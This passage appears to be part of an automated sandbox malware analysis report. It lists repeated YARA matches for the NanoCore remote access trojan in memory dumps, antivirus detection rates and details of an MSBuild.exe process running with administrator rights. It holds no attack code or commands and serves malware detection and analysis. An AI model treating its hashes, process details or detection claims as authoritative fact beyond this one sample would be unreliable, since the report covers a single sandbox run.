        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.268781078.00000000011D1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.272077281.000000000118B000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.272077281.000000000118B000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.272077281.000000000118B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.268745620.00000000011D1000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.268745620.00000000011D1000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.268745620.00000000011D1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.274048307.00000000011D1000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.274048307.00000000011D1000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.274048307.00000000011D1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.269076218.000000000126A000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.269076218.000000000126A000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.269076218.000000000126A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.268921996.0000000004481000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.268921996.0000000004481000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.268921996.0000000004481000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.272132273.00000000011A4000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.272132273.00000000011A4000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.272132273.00000000011A4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000003.271693708.0000000004481000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000003.271693708.0000000004481000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000B.00000003.271693708.0000000004481000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        Antivirus matches:
        • Detection: 100%, Avira
        • Detection: 55%, Virustotal, Browse
        • Detection: 48%, ReversingLabs
        Reputation:low

        Analysis Process: MSBuild.exe PID: 5796 Parent PID: 3192

        General

        Start time:10:32:28
        Start date:08/04/2021
        Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        Wow64 process (32bit):true
        Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        Imagebase:0xf60000
        File size:69632 bytes
        MD5 hash:88BBB7610152B48C2B3879473B17857E
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:.Net C# or VB.NET
        Yara matches:
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.287551362.0000000004581000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.287551362.0000000004581000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.286334104.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.286334104.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.286334104.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.287492907.0000000003581000.00000004.00000001.sdmp, Author: Joe Security
        Reputation:moderate

        Disassembly

        Code Analysis

        Reset < >